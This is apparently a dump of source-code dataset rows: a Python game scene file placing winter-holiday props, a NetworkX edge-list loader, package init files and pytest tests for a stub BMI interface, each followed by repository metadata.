VBase3(0.944, 1.0, 1.196), 'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}}, '1192813036.19akelts': {'Type': 'Effect Node', 'EffectName': 'torch_effect', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(16.066, 27.69, 0.728), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1228171574.52kmuller': {'Type': 'Door Locator Node', 'Name': 'door_locator', 'Hpr': VBase3(-1.084, 0.0, 0.0), 'Pos': Point3(0.226, -30.04, -0.042), 'Scale': VBase3(1.0, 1.0, 1.0)}, '1228171636.05kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(90.0, 0.0, 0.0), 'Pos': Point3(-19.562, -12.628, 9.043), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoSwag_winter08'}}, '1228171658.06kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(90.0, 0.0, 0.0), 'Pos': Point3(-19.497, -4.055, 8.9), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoSwag_winter08'}}, '1228171680.97kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(90.0, 0.0, 0.0), 'Pos': Point3(-19.522, 13.075, 8.571), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoSwag_winter08'}}, '1228171681.0kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(90.0, 0.0, 0.0), 'Pos': Point3(-19.48, 6.987, 8.709), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoSwag_winter08'}}, '1228171718.55kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(90.0, 0.0, 0.0), 'Pos': Point3(-23.464, 2.055, 9.623), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 
'models/props/pir_m_prp_hol_decoBow_winter08'}}, '1228171851.33kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-90.0, 0.0, 0.0), 'Pos': Point3(19.558, 12.771, 8.257), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoSwag_winter08'}}, '1228171851.36kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-90.0, 0.0, 0.0), 'Pos': Point3(19.6, 6.683, 8.394), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoSwag_winter08'}}, '1228171851.37kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-90.0, 0.0, 0.0), 'Pos': Point3(19.605, -5.139, 8.562), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoSwag_winter08'}}, '1228171851.39kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-90.0, 0.0, 0.0), 'Pos': Point3(19.519, -12.932, 8.729), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoSwag_winter08'}}, '1228171985.95kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-90.0, 0.0, 0.0), 'Pos': Point3(23.294, 2.108, 9.247), 'Scale': VBase3(1.749, 1.749, 1.749), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoBow_winter08'}}, '1228172029.81kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-22.915, 0.0, 0.0), 'Pos': Point3(-14.676, 27.506, 8.319), 'Scale': VBase3(0.745, 0.745, 0.745), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoGift03_winter08'}}, '1228172067.47kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(97.294, 0.0, 0.0), 'Pos': Point3(17.725, -11.752, 1.974), 'Scale': VBase3(0.877, 0.877, 0.877), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoGift03_winter08'}}, '1228172094.37kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': '', 'Hpr': VBase3(20.62, 0.0, 0.0), 'Pos': Point3(17.402, -13.417, 1.908), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoGift02_winter08'}}, '1228172137.52kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(22.222, 0.0, 0.0), 'Pos': Point3(-14.48, 27.114, 2.476), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoGift03_winter08'}}, '1228172150.87kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(43.198, 0.0, 0.0), 'Pos': Point3(-15.74, 26.194, 4.277), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoGift04_winter08'}}, '1257805377.33caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(29.215, 0.0, 0.0), 'Pos': Point3(-17.989, 24.828, 8.291), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoGift01_winter08'}}, '1257805389.23caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-80.692, 0.0, 0.0), 'Pos': Point3(-16.187, 26.439, 8.319), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoGift04_winter08'}}, '1257805548.61caoconno': 
{'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(179.828, 0.0, 0.0), 'Pos': Point3(0.134, -29.849, 16.921), 'Scale': VBase3(1.647, 1.647, 1.647), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoRibbon_winter08'}}, '1257805573.24caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-179.622, 0.0, 0.0), 'Pos': Point3(13.583, -29.761, 16.921), 'Scale': VBase3(1.647, 1.647, 1.647), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoRibbon_winter08'}}, '1257805604.96caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-3.461, -2.873, 38.03), 'Pos': Point3(1.516, -29.874, 17.264), 'Scale': VBase3(3.099, 3.099, 3.099), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_candycane_winter09'}}, '1257805629.21caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(178.92, 6.382, 0.0), 'Pos': Point3(-13.08, -29.713, 16.646), 'Scale': VBase3(1.795, 1.795, 1.795), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoBow_winter08'}}, '1257805691.46caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-178.182, 2.38, 35.723), 'Pos': Point3(-1.065, -29.816, 17.292), 'Scale': VBase3(3.099, 3.099, 3.099), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_candycane_winter09'}}, '1257805757.37caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(178.92, 6.382, 0.0), 'Pos': Point3(0.206, -29.526, 16.511), 'Scale': VBase3(1.795, 1.795, 1.795), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoBow_winter08'}}, '1257805801.97caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(178.92, 6.382, 0.0), 'Pos': Point3(13.537, -29.768, 16.596), 'Scale': VBase3(1.795, 1.795, 1.795), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoBow_winter08'}}, '1257891327.63caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(40.405, 0.0, 0.0), 'Pos': Point3(-1.49, 0.401, 2.948), 'Scale': VBase3(0.743, 0.743, 0.743), 'VisSize': '', 'Visual': {'Color': (0.6000000238418579, 1.0, 0.800000011920929, 1.0), 'Model': 'models/props/pir_m_prp_hol_decoGift01_winter08'}}, '1257891346.66caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-180.0, -89.326, -179.539), 'Pos': Point3(-2.572, 0.139, 2.984), 'Scale': VBase3(0.929, 0.929, 0.929), 'VisSize': '', 'Visual': {'Color': (0.800000011920929, 0.800000011920929, 1.0, 1.0), 'Model': 'models/props/pir_m_prp_hol_candycane_winter09'}}, '1257891403.07caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(-2.297, 1.647, 2.948), 'Scale': VBase3(0.515, 0.515, 0.515), 'VisSize': '', 'Visual': {'Color': (0.800000011920929, 0.800000011920929, 1.0, 1.0), 'Model': 'models/props/pir_m_prp_hol_decoGift01_winter08'}}, '1257891450.24caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(180.0, -89.326, 138.895), 'Pos': Point3(-2.13, -0.697, 2.993), 'Scale': VBase3(0.929, 0.929, 0.929), 'VisSize': '', 'Visual': {'Color': (0.800000011920929, 0.800000011920929, 1.0, 1.0), 'Model': 'models/props/pir_m_prp_hol_candycane_winter09'}}}, 'Visual': {'Model': 
'models/buildings/interior_spanish_npc'}}}, 'Node Links': [], 'Layers': {}, 'ObjectIds': {'1153420207.67dzlu01': '["Objects"]["1153420207.67dzlu01"]', '1165347933.66kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1165347933.66kmuller"]', '1166138034.99kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138034.99kmuller"]', '1166138092.34kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138092.34kmuller"]', '1166138151.37kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138151.37kmuller"]', '1166138161.79kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138161.79kmuller"]', '1166138390.93kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138390.93kmuller"]', '1166138443.79kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138443.79kmuller"]', '1166138454.85kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138454.85kmuller"]', '1166138510.96kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138510.96kmuller"]', '1166138524.92kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138524.92kmuller"]', '1166138537.42kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138537.42kmuller"]', '1166138621.31kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138621.31kmuller"]', '1166138646.6kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138646.6kmuller"]', '1166138674.59kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138674.59kmuller"]', '1166138708.48kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138708.48kmuller"]', '1166138742.6kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138742.6kmuller"]', '1166138817.45kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138817.45kmuller"]', '1166138973.9kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138973.9kmuller"]', '1166139009.4kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139009.4kmuller"]', '1166139125.65kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139125.65kmuller"]', '1166139259.49kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139259.49kmuller"]', '1166139339.62kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139339.62kmuller"]', '1166139450.46kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139450.46kmuller"]', '1166139482.6kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139482.6kmuller"]', '1166139534.14kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139534.14kmuller"]', '1166139664.39kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139664.39kmuller"]', '1166139726.17kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139726.17kmuller"]', '1166139823.07kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139823.07kmuller"]', '1166139883.79kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139883.79kmuller"]', '1166140032.53kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166140032.53kmuller"]', '1166143136.15kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166143136.15kmuller"]', '1166143173.57kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166143173.57kmuller"]', '1166143204.95kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166143204.95kmuller"]', '1166143219.04kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166143219.04kmuller"]', '1166143244.09kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166143244.09kmuller"]', 
'1166143275.89kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166143275.89kmuller"]', '1167972216.85kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1167972216.85kmuller"]', '1167972409.16kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1167972409.16kmuller"]', '1176423441.61dzlu': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1176423441.61dzlu"]', '1176423539.22dzlu': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1176423539.22dzlu"]', '1176423736.28dzlu': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1176423736.28dzlu"]', '1176424160.2dzlu': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1176424160.2dzlu"]', '1185496415.31kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1185496415.31kmuller"]', '1185496487.15kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1185496487.15kmuller"]', '1185496538.15kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1185496538.15kmuller"]', '1185496598.36kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1185496598.36kmuller"]', '1185496634.87kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1185496634.87kmuller"]', '1185496663.32kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1185496663.32kmuller"]', '1185496695.84kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1185496695.84kmuller"]', '1192813036.19akelts': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1192813036.19akelts"]', '1228171574.52kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171574.52kmuller"]', '1228171636.05kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171636.05kmuller"]', '1228171658.06kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171658.06kmuller"]', '1228171680.97kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171680.97kmuller"]', '1228171681.0kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171681.0kmuller"]', '1228171718.55kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171718.55kmuller"]', '1228171851.33kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171851.33kmuller"]', '1228171851.36kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171851.36kmuller"]', '1228171851.37kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171851.37kmuller"]', '1228171851.39kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171851.39kmuller"]', '1228171985.95kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171985.95kmuller"]', '1228172029.81kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228172029.81kmuller"]', '1228172067.47kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228172067.47kmuller"]', '1228172094.37kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228172094.37kmuller"]', '1228172137.52kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228172137.52kmuller"]', '1228172150.87kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228172150.87kmuller"]', '1257805377.33caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257805377.33caoconno"]', '1257805389.23caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257805389.23caoconno"]', '1257805548.61caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257805548.61caoconno"]', '1257805573.24caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257805573.24caoconno"]', '1257805604.96caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257805604.96caoconno"]', '1257805629.21caoconno': 
'["Objects"]["1153420207.67dzlu01"]["Objects"]["1257805629.21caoconno"]', '1257805691.46caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257805691.46caoconno"]', '1257805757.37caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257805757.37caoconno"]', '1257805801.97caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257805801.97caoconno"]', '1257891327.63caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257891327.63caoconno"]', '1257891346.66caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257891346.66caoconno"]', '1257891403.07caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257891403.07caoconno"]', '1257891450.24caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257891450.24caoconno"]'}}
extraInfo = {'camPos': Point3(0, -14, 0), 'camHpr': VBase3(0, 0, 0), 'focalLength': 0.852765381336, 'skyState': -1, 'fog': 0}
| 4,211.142857 | 29,056 | 0.664631 | 4,010 | 29,478 | 4.825187 | 0.159352 | 0.027908 | 0.027908 | 0.024187 | 0.55145 | 0.470722 | 0.444467 | 0.390253 | 0.370148 | 0.349992 | 0 | 0.259147 | 0.070052 | 29,478 | 7 | 29,057 | 4,211.142857 | 0.446686 | 0.007735 | 0 | 0 | 0 | 0 | 0.568762 | 0.289544 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 6 |
811be09e8efd00c1aea606c4e23d536a962dbfd3
| 65 |
py
|
Python
|
maple/backend/singularity/__init__.py
|
akashdhruv/maple
|
11e562f51b18b2251ea507c629a1981b031d2f35
|
[
"MIT"
] | null | null | null |
maple/backend/singularity/__init__.py
|
akashdhruv/maple
|
11e562f51b18b2251ea507c629a1981b031d2f35
|
[
"MIT"
] | 5 |
2021-12-24T08:55:42.000Z
|
2022-02-13T16:59:30.000Z
|
maple/backend/singularity/__init__.py
|
akashdhruv/maple
|
11e562f51b18b2251ea507c629a1981b031d2f35
|
[
"MIT"
] | null | null | null |
from . import image
from . import container
from . import system
| 16.25 | 23 | 0.769231 | 9 | 65 | 5.555556 | 0.555556 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.184615 | 65 | 3 | 24 | 21.666667 | 0.943396 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
812b4e30304f24bb277705592e38799b83099f91
| 1,049 |
py
|
Python
|
LoadGraph.py
|
mahdi-zafarmand/SNA
|
a7188a2ceb63355183e470648f6ae4fa90a22faa
|
[
"MIT"
] | null | null | null |
LoadGraph.py
|
mahdi-zafarmand/SNA
|
a7188a2ceb63355183e470648f6ae4fa90a22faa
|
[
"MIT"
] | null | null | null |
LoadGraph.py
|
mahdi-zafarmand/SNA
|
a7188a2ceb63355183e470648f6ae4fa90a22faa
|
[
"MIT"
] | 1 |
2020-10-28T01:52:36.000Z
|
2020-10-28T01:52:36.000Z
|
import networkx as nx
import os.path


def load_graph(path, weighted=False, delimiter='\t', self_loop=False):
    graph = nx.Graph()
    if not os.path.isfile(path):
        print("Error: file " + path + " not found!")
        exit(-1)
    with open(path) as file:
        for line in file.readlines():
            w = 1.0
            line = line.split(delimiter)
            v1 = int(line[0])
            v2 = int(line[1])
            graph.add_node(v1)
            graph.add_node(v2)
            if weighted:
                w = float(line[2])
            if (self_loop and v1 == v2) or (v1 != v2):
                graph.add_edge(v1, v2, weight=w)
    return graph


def load_graph_uncertain(path, delimiter='\t', self_loop=False):
    graph = nx.Graph()
    if not os.path.isfile(path):
        print("Error: file " + path + " not found!")
        exit(-1)
    with open(path) as file:
        for line in file.readlines():
            line = line.split(delimiter)
            v1 = int(line[0])
            v2 = int(line[1])
            graph.add_node(v1)
            graph.add_node(v2)
            w = float(line[2])
            p = float(line[3])
            if (self_loop and v1 == v2) or (v1 != v2):
                graph.add_edge(v1, v2, weight=w, prob=p)
    return graph
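# [Added usage sketch -- not part of the original record.] Exercises
# load_graph on a tiny tab-separated edge list; the file name
# 'example_edges.txt' is a hypothetical placeholder.
if __name__ == '__main__':
    with open('example_edges.txt', 'w') as f:
        f.write('1\t2\t0.5\n2\t3\t1.5\n')
    g = load_graph('example_edges.txt', weighted=True)
    print(g.number_of_nodes(), g.number_of_edges())  # expected output: 3 2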
| 20.98 | 70 | 0.625357 | 177 | 1,049 | 3.632768 | 0.276836 | 0.07465 | 0.07465 | 0.055988 | 0.755832 | 0.755832 | 0.755832 | 0.755832 | 0.755832 | 0.755832 | 0 | 0.037485 | 0.21163 | 1,049 | 49 | 71 | 21.408163 | 0.740024 | 0 | 0 | 0.756757 | 0 | 0 | 0.047664 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0.054054 | 0 | 0.162162 | 0.054054 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
8137ad04173c8650a7a1905ad7cd6c799cdbd81c
| 39 |
py
|
Python
|
pymutual/__init__.py
|
kimballh/pymutual
|
7d7f588099eee7bdd669d613756509c6ab44a911
|
[
"MIT"
] | null | null | null |
pymutual/__init__.py
|
kimballh/pymutual
|
7d7f588099eee7bdd669d613756509c6ab44a911
|
[
"MIT"
] | null | null | null |
pymutual/__init__.py
|
kimballh/pymutual
|
7d7f588099eee7bdd669d613756509c6ab44a911
|
[
"MIT"
] | null | null | null |
from .session import Session, MutualAPI
| 39 | 39 | 0.846154 | 5 | 39 | 6.6 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 39 | 1 | 39 | 39 | 0.942857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
d4bad788e453eaffecc4387f4afebe5f25e9867c
| 2,447 |
py
|
Python
|
tests/test_bmipy.py
|
visr/bmi-python
|
0fcca448d097bc001f7492094ce1fd95d041b81d
|
[
"MIT"
] | 14 |
2015-01-13T16:26:12.000Z
|
2021-07-22T04:56:59.000Z
|
tests/test_bmipy.py
|
visr/bmi-python
|
0fcca448d097bc001f7492094ce1fd95d041b81d
|
[
"MIT"
] | 11 |
2015-03-17T21:15:57.000Z
|
2021-03-24T21:31:00.000Z
|
tests/test_bmipy.py
|
visr/bmi-python
|
0fcca448d097bc001f7492094ce1fd95d041b81d
|
[
"MIT"
] | 9 |
2015-03-13T15:59:52.000Z
|
2021-06-28T11:40:51.000Z
|
import pytest

from bmipy import Bmi


class EmptyBmi(Bmi):
    def __init__(self):
        pass
    def initialize(self, config_file):
        pass
    def update(self):
        pass
    def update_until(self, then):
        pass
    def finalize(self):
        pass
    def get_var_type(self, var_name):
        pass
    def get_var_units(self, var_name):
        pass
    def get_var_nbytes(self, var_name):
        pass
    def get_var_itemsize(self, name):
        pass
    def get_var_location(self, name):
        pass
    def get_var_grid(self, var_name):
        pass
    def get_grid_rank(self, grid_id):
        pass
    def get_grid_size(self, grid_id):
        pass
    def get_value_ptr(self, var_name):
        pass
    def get_value(self, var_name):
        pass
    def get_value_at_indices(self, var_name, indices):
        pass
    def set_value(self, var_name, src):
        pass
    def set_value_at_indices(self, var_name, src, indices):
        pass
    def get_component_name(self):
        pass
    def get_input_item_count(self):
        pass
    def get_output_item_count(self):
        pass
    def get_input_var_names(self):
        pass
    def get_output_var_names(self):
        pass
    def get_grid_shape(self, grid_id):
        pass
    def get_grid_spacing(self, grid_id):
        pass
    def get_grid_origin(self, grid_id):
        pass
    def get_grid_type(self, grid_id):
        pass
    def get_start_time(self):
        pass
    def get_end_time(self):
        pass
    def get_current_time(self):
        pass
    def get_time_step(self):
        pass
    def get_time_units(self):
        pass
    def get_grid_edge_count(self, grid):
        pass
    def get_grid_edge_nodes(self, grid, edge_nodes):
        pass
    def get_grid_face_count(self, grid):
        pass
    def get_grid_face_nodes(self, grid, face_nodes):
        pass
    def get_grid_face_edges(self, grid, face_edges):
        pass
    def get_grid_node_count(self, grid):
        pass
    def get_grid_nodes_per_face(self, grid, nodes_per_face):
        pass
    def get_grid_x(self, grid, x):
        pass
    def get_grid_y(self, grid, y):
        pass
    def get_grid_z(self, grid, z):
        pass
def test_bmi_not_implemented():
    class MyBmi(Bmi):
        pass

    with pytest.raises(TypeError):
        MyBmi()


def test_bmi_implemented():
    assert isinstance(EmptyBmi(), Bmi)
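# [Added note -- not part of the original record.] These tests run under
# pytest, e.g. `pytest tests/test_bmipy.py`. Because Bmi is an abstract base
# class, a subclass that leaves any method unimplemented (MyBmi) cannot be
# instantiated, while EmptyBmi, which stubs every abstract method with
# `pass`, can.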
| 16.993056 | 60 | 0.608909 | 347 | 2,447 | 3.956772 | 0.195965 | 0.21413 | 0.254916 | 0.163146 | 0.532411 | 0.426074 | 0.219228 | 0 | 0 | 0 | 0 | 0 | 0.313854 | 2,447 | 143 | 61 | 17.111888 | 0.817749 | 0 | 0 | 0.457447 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010638 | 1 | 0.468085 | false | 0.457447 | 0.021277 | 0 | 0.510638 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 |
0
| 6 |
d4d2b1d5851dc6a58371dc3c355389cf9d7d425c
| 179 |
py
|
Python
|
test3_05.py
|
yoojunwoong/python_review01
|
9bb34f4ef75f951cd090fa623728c9542e7c7c27
|
[
"Apache-2.0"
] | null | null | null |
test3_05.py
|
yoojunwoong/python_review01
|
9bb34f4ef75f951cd090fa623728c9542e7c7c27
|
[
"Apache-2.0"
] | null | null | null |
test3_05.py
|
yoojunwoong/python_review01
|
9bb34f4ef75f951cd090fa623728c9542e7c7c27
|
[
"Apache-2.0"
